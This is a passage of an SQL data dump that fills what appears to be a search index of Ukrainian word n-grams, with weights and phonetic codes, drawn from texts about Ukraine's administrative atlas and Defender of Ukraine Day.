устрою','адміністративно-територіального устрою',0,1,2,'а000',1,'*'),(1569312,'адміністративно-територіального устрою україни','адміністративно-територіального устрою україни',0,1,2,'а000',1,'*'),(1569313,'атлас','атлас',0,0,0.3333,'а000',1,'*'),(1569314,'атлас адміністративно-територіального','атлас адміністративно-територіального',0,1,2,'а000',1,'*'),(1569315,'атлас адміністративно-територіального устрою','атлас адміністративно-територіального устрою',0,1,2,'а000',1,'*'),(1569316,'атлас містить','атлас містить',0,1,1.4333,'а000',1,'*'),(1569317,'атлас містить детальну','атлас містить детальну',0,1,1.7333,'а000',1,'*'),(1569318,'атлас можна','атлас можна',0,1,1.3667,'а000',1,'*'),(1569319,'атлас можна за','атлас можна за',0,1,1.4667,'а000',1,'*'),(1569320,'в новостворених','в новостворених',0,1,1.5,'в000',1,'*'),(1569321,'в новостворених районах','в новостворених районах',0,1,1.7667,'в000',1,'*'),(1569322,'громадах','громадах',0,0,0.5333,'г000',1,'*'),(1569323,'громадах кожного','громадах кожного',0,1,1.5333,'г000',1,'*'),(1569324,'громадах кожного нового','громадах кожного нового',0,1,1.7667,'г000',1,'*'),(1569325,'детальну','детальну',0,0,0.5333,'д000',1,'*'),(1569326,'детальну інформацію','детальну інформацію',0,1,1.6333,'д000',1,'*'),(1569327,'детальну інформацію щодо','детальну інформацію щодо',0,1,1.8,'д000',1,'*'),(1569328,'зверніть','зверніть',0,0,0.5333,'з000',1,'*'),(1569329,'зверніть увагу','зверніть увагу',0,1,1.4667,'з000',1,'*'),(1569330,'зверніть увагу на','зверніть увагу на',0,1,1.5667,'з000',1,'*'),(1569331,'кількість населення','кількість населення',0,1,1.6333,'к000',1,'*'),(1569332,'кількість населення склад','кількість населення склад',0,1,1.8333,'к000',1,'*'),(1569333,'кожної','кожної',0,0,0.4,'к000',2,'*'),(1569334,'кожної області','кожної області',0,1,1.4667,'к000',1,'*'),(1569335,'кожної області переглянути','кожної області переглянути',0,1,1.8667,'к000',1,'*'),(1569336,'кожного нового','кожного нового',0,1,1.4667,'к000',1,'*'),(1569337,'кожного нового району','кожного нового району',0,1,1.7,'к000',1,'*'),(1569338,'містить детальну','містить детальну',0,1,1.5333,'м000',1,'*'),(1569339,'містить детальну інформацію','містить детальну інформацію',0,1,1.9,'м000',1,'*'),(1569340,'межі','межі',0,0,0.2667,'м000',1,'*'),(1569341,'межі площі','межі площі',0,1,1.3333,'м000',1,'*'),(1569342,'межі площі кількість','межі площі кількість',0,1,1.6667,'м000',1,'*'),(1569343,'можна за','можна за',0,1,1.2667,'м000',1,'*'),(1569344,'можна за посиланням','можна за посиланням',0,1,1.6333,'м000',1,'*'),(1569345,'на чисельність','на чисельність',0,1,1.4667,'н000',1,'*'),(1569346,'на чисельність населення','на чисельність населення',0,1,1.8,'н000',1,'*'),(1569347,'назви','назви',0,0,0.3333,'н000',1,'*'),(1569348,'назви межі','назви межі',0,1,1.3333,'н000',1,'*'),(1569349,'назви межі площі','назви межі площі',0,1,1.5333,'н000',1,'*'),(1569350,'населення','населення',0,0,0.6,'н000',1,'*'),(1569351,'населення в','населення в',0,1,1.3667,'н000',1,'*'),(1569352,'населення в новостворених','населення в новостворених',0,1,1.8333,'н000',1,'*'),(1569353,'населення склад','населення склад',0,1,1.5,'н000',1,'*'),(1569354,'населення склад по','населення склад по',0,1,1.6,'н000',1,'*'),(1569355,'нового','нового',0,0,0.4,'н000',1,'*'),(1569356,'нового адміністративно-територіального','нового адміністративно-територіального',0,1,2,'н000',1,'*'),(1569357,'нового адміністративно-територіального устрою','нового адміністративно-територіального устрою',0,1,2,'н000',1,'*'),(1569358,'нового району','нового району',0,1,1.4333,'н000',1,'*'),(1569359,'нового району кожної','нового району кожної',0,1,1.6667,'н000',1,'*'),(1569360,'новостворених районах','новостворених районах',0,1,1.7,'н000',1,'*'),(1569361,'новостворених районах по','новостворених районах по',0,1,1.8,'н000',1,'*'),(1569362,'області переглянути','області переглянути',0,1,1.6333,'о000',1,'*'),(1569363,'області переглянути атлас','області переглянути атлас',0,1,1.8333,'о000',1,'*'),(1569364,'областях','областях',0,0,0.5333,'о000',1,'*'),(1569365,'переглянути атлас','переглянути атлас',0,1,1.5667,'п000',1,'*'),(1569366,'переглянути атлас можна','переглянути атлас можна',0,1,1.7667,'п000',1,'*'),(1569367,'площі','площі',0,0,0.3333,'п000',1,'*'),(1569368,'площі кількість','площі кількість',0,1,1.5,'п000',1,'*'),(1569369,'площі кількість населення','площі кількість населення',0,1,1.8333,'п000',1,'*'),(1569370,'по громадах','по громадах',0,1,1.3667,'п000',1,'*'),(1569371,'по громадах кожного','по громадах кожного',0,1,1.6333,'п000',1,'*'),(1569372,'по областях','по областях',0,1,1.3667,'п000',1,'*'),(1569373,'посиланням https www','посиланням https www',0,1,1.6667,'п312',1,'*'),(1569374,'районах','районах',0,0,0.4667,'р000',1,'*'),(1569375,'районах по','районах по',0,1,1.3333,'р000',1,'*'),(1569376,'районах по областях','районах по областях',0,1,1.6333,'р000',1,'*'),(1569377,'району кожної','району кожної',0,1,1.4333,'р000',1,'*'),(1569378,'району кожної області','району кожної області',0,1,1.7,'р000',1,'*'),(1569379,'склад по','склад по',0,1,1.2667,'с000',1,'*'),(1569380,'склад по громадах','склад по громадах',0,1,1.5667,'с000',1,'*'),(1569381,'увагу','увагу',0,0,0.3333,'у000',2,'*'),(1569382,'увагу на','увагу на',0,1,1.2667,'у000',2,'*'),(1569383,'увагу на чисельність','увагу на чисельність',0,1,1.6667,'у000',1,'*'),(1569384,'україни','україни',0,0,0.4667,'у000',8,'*'),(1569385,'україни назви','україни назви',0,1,1.4333,'у000',1,'*'),(1569386,'україни назви межі','україни назви межі',0,1,1.6,'у000',1,'*'),(1569387,'устрою','устрою',0,0,0.4,'у000',1,'*'),(1569388,'устрою україни','устрою україни',0,1,1.4667,'у000',1,'*'),(1569389,'устрою україни назви','устрою україни назви',0,1,1.6667,'у000',1,'*'),(1569390,'чисельність','чисельність',0,0,0.7333,'ч000',1,'*'),(1569391,'чисельність населення','чисельність населення',0,1,1.7,'ч000',1,'*'),(1569392,'чисельність населення в','чисельність населення в',0,1,1.7667,'ч000',1,'*'),(1569393,'щодо нового','щодо нового',0,1,1.3667,'щ000',1,'*'),(1569394,'щодо нового адміністративно-територіального','щодо нового адміністративно-територіального',0,1,2,'щ000',1,'*'),(1583964,'14 zhovtnya','14 zhovtnya',0,1,1.3667,'Z135',2,'*'),(1583966,'14 жовтня','14 жовтня',0,1,1.3,'ж000',2,'*'),(1584077,'армії','армії',0,0,0.3333,'а000',2,'*'),(1584096,'богородиці','богородиці',0,0,0.6667,'б000',2,'*'),(1584170,'вважається','вважається',0,0,0.6667,'в000',2,'*'),(1584182,'взяли','взяли',0,0,0.3333,'в000',3,'*'),(1584205,'власної','власної',0,0,0.4667,'в000',2,'*'),(1584213,'воїнів','воїнів',0,0,0.4,'в000',2,'*'),(1584214,'воїнів які','воїнів які',0,1,1.3333,'в000',2,'*'),(1584464,'козаки','козаки',0,0,0.4,'к000',2,'*'),(1584637,'нашої','нашої',0,0,0.3333,'н000',3,'*'),(1584653,'незалежно','незалежно',0,0,0.6,'н000',2,'*'),(1584654,'незалежно від','незалежно від',0,1,1.4333,'н000',2,'*'),(1584789,'повстанської','повстанської',0,0,0.8,'п000',2,'*'),(1584790,'повстанської армії','повстанської армії',0,1,1.6,'п000',2,'*'),(1584812,'покрова','покрова',0,0,0.4667,'п000',2,'*'),(1584836,'покрову','покрову',0,0,0.4667,'п000',2,'*'),(1584865,'пресвятої','пресвятої',0,0,0.6,'п000',2,'*'),(1584866,'пресвятої богородиці','пресвятої богородиці',0,1,1.6667,'п000',2,'*'),(1584968,'свята','свята',0,0,0.3333,'с000',2,'*'),(1584974,'свято','свято',0,0,0.3333,'с000',2,'*'),(1585105,'українські','українські',0,0,0.6667,'у000',2,'*'),(1585111,'української','української',0,0,0.7333,'у000',2,'*'),(1585112,'української повстанської','української повстанської',0,1,1.8,'у000',2,'*'),(1585113,'української повстанської армії','української повстанської армії',0,1,2,'у000',2,'*'),(1585149,'цей','цей',0,0,0.2,'ц000',2,'*'),(1585162,'цього','цього',0,0,0.3333,'ц000',5,'*'),(1585168,'часи','часи',0,0,0.2667,'ч000',2,'*'),(1592149,'14 zhovtnya den','14 zhovtnya den',0,1,1.5,'Z13535',1,'*'),(1592150,'14 жовтня 1942','14 жовтня 1942',0,1,1.4667,'ж000',1,'*'),(1592151,'14 жовтня 2014','14 жовтня 2014',0,1,1.4667,'ж000',1,'*'),(1592152,'14 жовтня в','14 жовтня в',0,1,1.3667,'ж000',1,'*'),(1592153,'14 жовтня день','14 жовтня день',0,1,1.4667,'ж000',1,'*'),(1592154,'1917','1917',0,0,0.4,'',1,'*'),(1592155,'1917 1921','1917 1921',0,1,1.3,'',1,'*'),(1592156,'1917 1921 років','1917 1921 років',0,1,1.5,'р000',1,'*'),(1592157,'1921','1921',0,0,0.4,'',1,'*'),(1592158,'1921 років','1921 років',0,1,1.3333,'р000',1,'*'),(1592159,'1921 років зберігало','1921 років зберігало',0,1,1.6667,'р000',1,'*'),(1592160,'1942','1942',0,0,0.4,'',1,'*'),(1592161,'1942 року','1942 року',0,1,1.3,'р000',1,'*'),(1592162,'1942 року вважається','1942 року вважається',0,1,1.6667,'р000',1,'*'),(1592163,'2014','2014',0,0,0.4,'',1,'*'),(1592164,'2014 року','2014 року',0,1,1.3,'р000',1,'*'),(1592165,'2014 року у','2014 року у',0,1,1.3667,'р000',1,'*'),(1592166,'2480','2480',0,0,0.4,'',1,'*'),(1592167,'806','806',0,0,0.3,'',1,'*'),(1592168,'806 від','806 від',0,1,1.2333,'в000',1,'*'),(1592169,'806 від 14','806 від 14',0,1,1.3333,'в000',1,'*'),(1592170,'den zakhisnika','den zakhisnika',0,1,1.4667,'D5252',1,'*'),(1592171,'den zakhisnika ukrajini','den zakhisnika ukrajini',0,1,1.7667,'D5252625',1,'*'),(1592172,'zakhisnika','zakhisnika',0,0,0.6667,'Z520',1,'*'),(1592173,'zakhisnika ukrajini','zakhisnika ukrajini',0,1,1.6333,'Z52625',1,'*'),(1592174,'zhovtnya den','zhovtnya den',0,1,1.4,'Z13535',1,'*'),(1592175,'zhovtnya den zakhisnika','zhovtnya den zakhisnika',0,1,1.7667,'Z13535252',1,'*'),(1592176,'і відновлення','і відновлення',0,1,1.4333,'і000',1,'*'),(1592177,'і відновлення територіальної','і відновлення територіальної',0,1,1.9333,'і000',1,'*'),(1592178,'і внутрішня','і внутрішня',0,1,1.3667,'і000',1,'*'),(1592179,'і внутрішня консолідація','і внутрішня консолідація',0,1,1.8,'і000',1,'*'),(1592180,'і добровольчих','і добровольчих',0,1,1.4667,'і000',1,'*'),(1592181,'і добровольчих формувань','і добровольчих формувань',0,1,1.8,'і000',1,'*'),(1592182,'і обороняють','і обороняють',0,1,1.4,'і000',1,'*'),(1592183,'і обороняють нашу','і обороняють нашу',0,1,1.5667,'і000',1,'*'),(1592184,'і подякувати','і подякувати',0,1,1.4,'і000',1,'*'),(1592185,'і подякувати всім','і подякувати всім',0,1,1.5667,'і000',1,'*'),(1592186,'і територіальну','і територіальну',0,1,1.5,'і000',1,'*'),(1592187,'і територіальну цілісність','і територіальну цілісність',0,1,1.8667,'і000',1,'*'),(1592188,'із розвитком','із розвитком',0,1,1.4,'і000',1,'*'),(1592189,'із розвитком українського','із розвитком українського',0,1,1.8333,'і000',1,'*'),(1592190,'історії','історії',0,0,0.4667,'і000',1,'*'),(1592191,'історії це','історії це',0,1,1.3333,'і000',1,'*'),(1592192,'історії це день','історії це день',0,1,1.5,'і000',1,'*'),(1592193,'історія','історія',0,0,0.4667,'і000',2,'*'),(1592194,'історія цього','історія цього',0,1,1.4333,'і000',1,'*'),(1592195,'історія цього свята','історія цього свята',0,1,1.6333,'і000',1,'*'),(1592196,'агресію','агресію',0,0,0.4667,'а000',1,'*'),(1592197,'агресію російської','агресію російської',0,1,1.6,'а000',1,'*'),(1592198,'агресію російської федерації','агресію російської федерації',0,1,1.9333,'а000',1,'*'),(1592199,'агресором','агресором',0,0,0.6,'а000',1,'*'),(1592200,'агресором історія','агресором історія',0,1,1.5667,'а000',1,'*'),(1592201,'агресором історія цього','агресором історія цього',0,1,1.7667,'а000',1,'*'),(1592202,'активно модернізується','активно модернізується',0,1,1.7333,'а000',1,'*'),(1592203,'активно модернізується позбувається','активно модернізується позбувається',0,1,2,'а000',1,'*'),(1592204,'армії з','армії з',0,1,1.2333,'а000',1,'*'),(1592205,'армії з початком','армії з початком',0,1,1.5333,'а000',1,'*'),(1592206,'армія','армія',0,0,0.3333,'а000',1,'*'),(1592207,'армія активно','армія активно',0,1,1.4333,'а000',1,'*'),(1592208,'армія активно модернізується','армія активно модернізується',0,1,1.9333,'а000',1,'*'),(1592209,'бійці','бійці',0,0,0.3333,'б000',1,'*'),(1592210,'бійці сучасних','бійці сучасних',0,1,1.4667,'б000',1,'*'),(1592211,'бійці сучасних збройних','бійці сучасних збройних',0,1,1.7667,'б000',1,'*'),(1592212,'без збройної','без збройної',0,1,1.4,'б000',1,'*'),(1592213,'без збройної відсічі','без збройної відсічі',0,1,1.6667,'б000',1,'*'),(1592214,'боєздатне','боєздатне',0,0,0.6,'б000',1,'*'),(1592215,'боєздатне військо','боєздатне військо',0,1,1.5667,'б000',1,'*'),(1592216,'боєздатне військо і','боєздатне військо і',0,1,1.6333,'б000',1,'*'),(1592217,'богородиці відзначали','богородиці відзначали',0,1,1.7,'б000',1,'*'),(1592218,'богородиці відзначали козаки','богородиці відзначали козаки',0,1,1.9333,'б000',1,'*'),(1592219,'в назвах','в назвах',0,1,1.2667,'в000',1,'*'),(1592220,'в назвах військових','в назвах військових',0,1,1.6333,'в000',1,'*'),(1592221,'в різні','в різні',0,1,1.2333,'в000',1,'*'),(1592222,'в різні часи','в різні часи',0,1,1.4,'в000',1,'*'),(1592223,'в україні','в україні',0,1,1.3,'в000',2,'*'),(1592224,'в україні відзначається','в україні відзначається',0,1,1.7667,'в000',1,'*'),(1592225,'від 14','від 14',0,1,1.2,'в000',1,'*'),(1592226,'від 14 жовтня','від 14 жовтня',0,1,1.4333,'в000',1,'*'),(1592227,'від окупанта','від окупанта',0,1,1.4,'в000',1,'*'),(1592228,'від окупанта без','від окупанта без',0,1,1.5333,'в000',1,'*'),(1592229,'від службового','від службового',0,1,1.4667,'в000',1,'*'),(1592230,'від службового становища','від службового становища',0,1,1.8,'в000',1,'*'),(1592231,'від часів','від часів',0,1,1.3,'в000',1,'*'),(1592232,'від часів русі','від часів русі',0,1,1.4667,'в000',1,'*'),(1592233,'відзначається','відзначається',0,0,0.8667,'в000',1,'*'),(1592234,'відзначається день','відзначається день',0,1,1.6,'в000',1,'*'),(1592235,'відзначається день захисника','відзначається день захисника',0,1,1.9333,'в000',1,'*'),(1592236,'відзначали','відзначали',0,0,0.6667,'в000',1,'*'),(1592237,'відзначали козаки','відзначали козаки',0,1,1.5667,'в000',1,'*'),(1592238,'відзначали козаки за','відзначали козаки за',0,1,1.6667,'в000',1,'*'),(1592239,'відновлення','відновлення',0,0,0.7333,'в000',1,'*'),(1592240,'відновлення територіальної','відновлення територіальної',0,1,1.8667,'в000',1,'*'),(1592241,'відновлення територіальної цілісності','відновлення територіальної цілісності',0,1,2,'в000',1,'*'),(1592242,'відновлює','відновлює',0,0,0.6,'в000',1,'*'),(1592243,'відновлює українські','відновлює українські',0,1,1.6667,'в000',1,'*'),(1592244,'відновлює українські військові','відновлює українські військові',0,1,2,'в000',1,'*'),(1592245,'відсічі','відсічі',0,0,0.4667,'в000',1,'*'),(1592246,'відсічі неможливо','відсічі неможливо',0,1,1.5667,'в000',1,'*'),(1592247,'відсічі неможливо тож','відсічі неможливо тож',0,1,1.7,'в000',1,'*'),(1592248,'відстоюють','відстоюють',0,0,0.6667,'в000',1,'*'),(1592249,'відстоюють суверенітет','відстоюють суверенітет',0,1,1.7333,'в000',1,'*'),(1592250,'відстоюють суверенітет україни','відстоюють суверенітет україни',0,1,2,'в000',1,'*'),(1592251,'відстояти','відстояти',0,0,0.6,'в000',1,'*'),(1592252,'відстояти незалежність','відстояти незалежність',0,1,1.7333,'в000',1,'*'),(1592253,'відстояти незалежність україни','відстояти незалежність україни',0,1,2,'в000',1,'*'),(1592254,'війні','війні',0,0,0.3333,'в000',1,'*'),(1592255,'війні з','війні з',0,1,1.2333,'в000',1,'*'),(1592256,'війні з російським','війні з російським',0,1,1.6,'в000',1,'*'),(1592257,'війнимайже','війнимайже',0,0,0.6667,'в000',1,'*'),(1592258,'війнимайже чотириста','війнимайже чотириста',0,1,1.6667,'в000',1,'*'),(1592259,'війнимайже чотириста тисяч','війнимайже чотириста тисяч',0,1,1.8667,'в000',1,'*'),(1592260,'війська','війська',0,0,0.4667,'в000',1,'*'),(1592261,'війська від','війська від',0,1,1.3667,'в000',1,'*'),(1592262,'війська від часів','війська від часів',0,1,1.5667,'в000',1,'*'),(1592263,'війська та','війська та',0,1,1.3333,'в000',1,'*'),(1592264,'війська та його','війська та його',0,1,1.5,'в000',1,'*'),(1592265,'військо','військо',0,0,0.4667,'в000',1,'*'),(1592266,'військо 1917','військо 1917',0,1,1.4,'в000',1,'*'),(1592267,'військо 1917 1921','військо 1917 1921',0,1,1.5667,'в000',1,'*'),(1592268,'військо і','військо і',0,1,1.3,'в000',1,'*'),(1592269,'військо і внутрішня','військо і внутрішня',0,1,1.6333,'в000',1,'*'),(1592270,'військові','військові',0,0,0.6,'в000',1,'*'),(1592271,'військові традиції','військові традиції',0,1,1.6,'в000',1,'*'),(1592272,'військові традиції в','військові традиції в',0,1,1.6667,'в000',1,'*'),(1592273,'військові традиції у','військові традиції у',0,1,1.6667,'в000',1,'*'),(1592274,'військових','військових',0,0,0.6667,'в000',2,'*'),(1592275,'військових традицій','військових традицій',0,1,1.6333,'в000',1,'*'),(1592276,'військових традицій щорічне','військових традицій щорічне',0,1,1.9,'в000',1,'*'),(1592277,'військових частин','військових частин',0,1,1.5667,'в000',1,'*'),(1592278,'військових частин структурі','військових частин структурі',0,1,1.9,'в000',1,'*'),(1592279,'вважається символічним','вважається символічним',0,1,1.7333,'в000',1,'*'),(1592280,'вважається символічним днем','вважається символічним днем',0,1,1.9,'в000',1,'*'),(1592281,'взяли зброю','взяли зброю',0,1,1.3667,'в000',1,'*'),(1592282,'взяли зброю до','взяли зброю до',0,1,1.4667,'в000',1,'*'),(1592283,'власної держави','власної держави',0,1,1.5,'в000',1,'*'),(1592284,'власної держави забезпечать','власної держави забезпечать',0,1,1.9,'в000',1,'*'),(1592285,'внутрішня','внутрішня',0,0,0.6,'в000',1,'*'),(1592286,'внутрішня консолідація','внутрішня консолідація',0,1,1.7333,'в000',1,'*'),(1592287,'внутрішня консолідація суспільства','внутрішня консолідація суспільства',0,1,2,'в000',1,'*'),(1592288,'воїнів які в','воїнів які в',0,1,1.4,'в000',1,'*'),(1592289,'вояків','вояків',0,0,0.4,'в000',1,'*'),(1592290,'вояків і','вояків і',0,1,1.2667,'в000',1,'*'),(1592291,'вояків і подякувати','вояків і подякувати',0,1,1.6333,'в000',1,'*'),(1592292,'всім','всім',0,0,0.2667,'в000',1,'*'),(1592293,'всім громадянам','всім громадянам',0,1,1.5,'в000',1,'*'),(1592294,'всім громадянам які','всім громадянам які',0,1,1.6333,'в000',1,'*'),(1592295,'встановлено','встановлено',0,0,0.7333,'в000',1,'*'),(1592296,'встановлено указом','встановлено указом',0,1,1.6,'в000',1,'*'),(1592297,'встановлено указом президента','встановлено указом президента',0,1,1.9667,'в000',1,'*'),(1592298,'вшановуємо','вшановуємо',0,0,0.6667,'в000',1,'*'),(1592299,'вшановуємо сучасних','вшановуємо сучасних',0,1,1.6333,'в000',1,'*'),(1592300,'вшановуємо сучасних захисників','вшановуємо сучасних захисників',0,1,2,'в000',1,'*'),(1592301,'гвардії','гвардії',0,0,0.4667,'г000',1,'*'),(1592302,'гвардії правоохоронних','гвардії правоохоронних',0,1,1.7333,'г000',1,'*'),(1592303,'гвардії правоохоронних органів','гвардії правоохоронних органів',0,1,2,'г000',1,'*'),(1592304,'героїв','героїв',0,0,0.4,'г000',1,'*'),(1592305,'героїв різних','героїв різних',0,1,1.4333,'г000',1,'*'),(1592306,'героїв різних епох','героїв різних епох',0,1,1.6,'г000',1,'*'),(1592307,'громадянам','громадянам',0,0,0.6667,'г000',1,'*'),(1592308,'громадянам які','громадянам які',0,1,1.4667,'г000',1,'*'),(1592309,'громадянам які присвятили','громадянам які присвятили',0,1,1.8333,'г000',1,'*'),(1592310,'давню','давню',0,0,0.3333,'д000',1,'*'),(1592311,'давню традицію','давню традицію',0,1,1.4667,'д000',1,'*'),(1592312,'давню традицію покрову','давню традицію покрову',0,1,1.7333,'д000',1,'*'),(1592313,'день захисника','день захисника',0,1,1.4667,'д000',1,'*'),(1592314,'день захисника україни','день захисника україни',0,1,1.7333,'д000',1,'*'),(1592315,'день коли','день коли',0,1,1.3,'д000',1,'*'),(1592316,'день коли необхідно','день коли необхідно',0,1,1.6333,'д000',1,'*'),(1592317,'день українці','день українці',0,1,1.4333,'д000',1,'*'),(1592318,'день українці поціновують','день українці поціновують',0,1,1.8333,'д000',1,'*'),(1592319,'держави','держави',0,0,0.4667,'д000',1,'*'),(1592320,'держави забезпечать','держави забезпечать',0,1,1.6333,'д000',1,'*'),(1592321,'держави забезпечать захист','держави забезпечать захист',0,1,1.8667,'д000',1,'*'),(1592322,'держави звільнити','держави звільнити',0,1,1.5667,'д000',1,'*'),(1592323,'держави звільнити українську','держави звільнити українську',0,1,1.9333,'д000',1,'*'),(1592324,'державне','державне',0,0,0.5333,'д000',1,'*'),(1592325,'державне свято','державне свято',0,1,1.4667,'д000',1,'*'),(1592326,'державне свято встановлено','державне свято встановлено',0,1,1.8667,'д000',1,'*'),(1592327,'днем','днем',0,0,0.2667,'д000',3,'*'),(1592328,'днем утворення','днем утворення',0,1,1.4667,'д000',1,'*'),(1592329,'днем утворення української','днем утворення української',0,1,1.8667,'д000',1,'*'),(1592330,'до власної','до власної',0,1,1.3333,'д000',1,'*'),(1592331,'до власної держави','до власної держави',0,1,1.6,'д000',1,'*'),(1592332,'до рук','до рук',0,1,1.2,'д000',1,'*'),(1592333,'до рук у','до рук у',0,1,1.2667,'д000',1,'*'),(1592334,'добровольчих','добровольчих',0,0,0.8,'д000',1,'*'),(1592335,'добровольчих формувань','добровольчих формувань',0,1,1.7333,'д000',1,'*'),(1592336,'добровольчих формувань щоб','добровольчих формувань щоб',0,1,1.8667,'д000',1,'*'),(1592337,'другу','другу',0,0,0.3333,'д000',1,'*'),(1592338,'другу назву','другу назву',0,1,1.3667,'д000',1,'*'),(1592339,'другу назву козацька','другу назву козацька',0,1,1.6667,'д000',1,'*'),(1592340,'епох','епох',0,0,0.2667,'е000',1,'*'),(1592341,'епох нашої','епох нашої',0,1,1.3333,'е000',1,'*'),(1592342,'епох нашої історії','епох нашої історії',0,1,1.6,'е000',1,'*'),(1592343,'життя','життя',0,0,0.3333,'ж000',4,'*'),(1592344,'життя захисту','життя захисту',0,1,1.4333,'ж000',1,'*'),(1592345,'життя захисту української','життя захисту української',0,1,1.8333,'ж000',1,'*'),(1592346,'жовтня 1942','жовтня 1942',0,1,1.3667,'ж000',1,'*'),(1592347,'жовтня 1942 року','жовтня 1942 року',0,1,1.5333,'ж000',1,'*'),(1592348,'жовтня 2014','жовтня 2014',0,1,1.3667,'ж000',1,'*'),(1592349,'жовтня 2014 року','жовтня 2014 року',0,1,1.5333,'ж000',1,'*'),(1592350,'жовтня в','жовтня в',0,1,1.2667,'ж000',1,'*'),(1592351,'жовтня в україні','жовтня в україні',0,1,1.5333,'ж000',1,'*'),(1592352,'жовтня день','жовтня день',0,1,1.3667,'ж000',1,'*'),(1592353,'жовтня день захисника','жовтня день захисника',0,1,1.7,'ж000',1,'*'),(1592354,'з початком','з початком',0,1,1.3333,'з000',1,'*'),(1592355,'з початком сучасної','з початком сучасної',0,1,1.6333,'з000',1,'*'),(1592356,'з розвитком','з розвитком',0,1,1.3667,'з000',1,'*'),(1592357,'з розвитком війська','з розвитком війська',0,1,1.6333,'з000',1,'*'),(1592358,'з російським','з російським',0,1,1.4,'з000',1,'*'),(1592359,'з російським агресором','з російським агресором',0,1,1.7333,'з000',1,'*'),(1592360,'за що','за що',0,1,1.1667,'з000',1,'*'),(1592361,'за що свято','за що свято',0,1,1.3667,'з000',1,'*'),(1592362,'забезпечать','забезпечать',0,0,0.7333,'з000',1,'*'),(1592363,'забезпечать захист','забезпечать захист',0,1,1.6,'з000',1,'*'),(1592364,'забезпечать захист і','забезпечать захист і',0,1,1.6667,'з000',1,'*'),(1592365,'загиблих','загиблих',0,0,0.5333,'з000',1,'*'),(1592366,'загиблих вояків','загиблих вояків',0,1,1.5,'з000',1,'*'),(1592367,'загиблих вояків і','загиблих вояків і',0,1,1.5667,'з000',1,'*'),(1592368,'захисників','захисників',0,0,0.6667,'з000',1,'*'),(1592369,'захисників минулого','захисників минулого',0,1,1.6333,'з000',1,'*'),(1592370,'захисників минулого успадкували','захисників минулого успадкували',0,1,2,'з000',1,'*'),(1592371,'захисників україни','захисників україни',0,1,1.6,'з000',1,'*'),(1592372,'захисників україни незалежно','захисників україни незалежно',0,1,1.9333,'з000',1,'*'),(1592373,'захисників україни та','захисників україни та',0,1,1.7,'з000',1,'*'),(1592374,'захисника','захисника',0,0,0.6,'з000',1,'*'),(1592375,'захисника україни','захисника україни',0,1,1.5667,'з000',1,'*'),(1592376,'захисника україни ми','захисника україни ми',0,1,1.6667,'з000',1,'*'),(1592377,'захисника україни який','захисника україни який',0,1,1.7333,'з000',1,'*'),(1592378,'захист','захист',0,0,0.4,'з000',2,'*'),(1592379,'захист і','захист і',0,1,1.2667,'з000',1,'*'),(1592380,'захист і відновлення','захист і відновлення',0,1,1.6667,'з000',1,'*'),(1592381,'захисту','захисту',0,0,0.4667,'з000',1,'*'),(1592382,'захисту української','захисту української',0,1,1.6333,'з000',1,'*'),(1592383,'захисту української держави','захисту української держави',0,1,1.9,'з000',1,'*'),(1592384,'зберігало','зберігало',0,0,0.6,'з000',1,'*'),(1592385,'зберігало козацькі','зберігало козацькі',0,1,1.6,'з000',1,'*'),(1592386,'зберігало козацькі військові','зберігало козацькі військові',0,1,1.9333,'з000',1,'*'),(1592387,'збройних','збройних',0,0,0.5333,'з000',1,'*'),(1592388,'збройних сил','збройних сил',0,1,1.4,'з000',1,'*'),(1592389,'збройних сил національної','збройних сил національної',0,1,1.8333,'з000',1,'*'),(1592390,'збройних сил україни','збройних сил україни',0,1,1.6667,'з000',1,'*'),(1592391,'збройної','збройної',0,0,0.5333,'з000',1,'*'),(1592392,'збройної відсічі','збройної відсічі',0,1,1.5333,'з000',1,'*'),(1592393,'збройної відсічі неможливо','збройної відсічі неможливо',0,1,1.8667,'з000',1,'*'),(1592394,'зброю','зброю',0,0,0.3333,'з000',1,'*'),(1592395,'зброю до','зброю до',0,1,1.2667,'з000',1,'*'),(1592396,'зброю до рук','зброю до рук',0,1,1.4,'з000',1,'*'),(1592397,'звільнити','звільнити',0,0,0.6,'з000',1,'*'),(1592398,'звільнити українську','звільнити українську',0,1,1.6667,'з000',1,'*'),(1592399,'звільнити українську територію','звільнити українську територію',0,1,2,'з000',1,'*'),(1592400,'згадати','згадати',0,0,0.4667,'з000',1,'*'),(1592401,'згадати загиблих','згадати загиблих',0,1,1.5333,'з000',1,'*'),(1592402,'згадати загиблих вояків','згадати загиблих вояків',0,1,1.7667,'з000',1,'*'),(1592403,'зупинити','зупинити',0,0,0.5333,'з000',1,'*'),(1592404,'зупинити агресію','зупинити агресію',0,1,1.5333,'з000',1,'*'),(1592405,'зупинити агресію російської','зупинити агресію російської',0,1,1.9,'з000',1,'*'),(1592406,'його військових','його військових',0,1,1.5,'й000',1,'*'),(1592407,'його військових традицій','його військових традицій',0,1,1.8,'й000',1,'*'),(1592408,'козаки за','козаки за',0,1,1.3,'к000',1,'*'),(1592409,'козаки за що','козаки за що',0,1,1.4,'к000',1,'*'),(1592410,'козацькі','козацькі',0,0,0.5333,'к000',1,'*'),(1592411,'козацькі військові','козацькі військові',0,1,1.6,'к000',1,'*'),(1592412,'козацькі військові традиції','козацькі військові традиції',0,1,1.9,'к000',1,'*'),(1592413,'козацька','козацька',0,0,0.5333,'к000',1,'*'),(1592414,'козацька покрова','козацька покрова',0,1,1.5333,'к000',1,'*'),(1592415,'козацька покрова українське','козацька покрова українське',0,1,1.9,'к000',1,'*'),(1592416,'коли','коли',0,0,0.2667,'к000',2,'*'),(1592417,'коли необхідно','коли необхідно',0,1,1.4667,'к000',1,'*'),(1592418,'коли необхідно згадати','коли необхідно згадати',0,1,1.7333,'к000',1,'*'),(1592419,'консолідація','консолідація',0,0,0.8,'к000',1,'*'),(1592420,'консолідація суспільства','консолідація суспільства',0,1,1.8,'к000',1,'*'),(1592421,'консолідація суспільства на','консолідація суспільства на',0,1,1.9,'к000',1,'*'),(1592422,'країни','країни',0,0,0.4,'к000',1,'*'),(1592423,'лавах','лавах',0,0,0.3333,'л000',1,'*'),(1592424,'лавах збройних','лавах збройних',0,1,1.4667,'л000',1,'*'),(1592425,'лавах збройних сил','лавах збройних сил',0,1,1.6,'л000',1,'*'),(1592426,'має давню','має давню',0,1,1.3,'м000',1,'*'),(1592427,'має давню традицію','має давню традицію',0,1,1.6,'м000',1,'*'),(1592428,'ми','ми',0,0,0.1333,'м000',2,'*'),(1592429,'ми вшановуємо','ми вшановуємо',0,1,1.4333,'м000',1,'*'),(1592430,'ми вшановуємо сучасних','ми вшановуємо 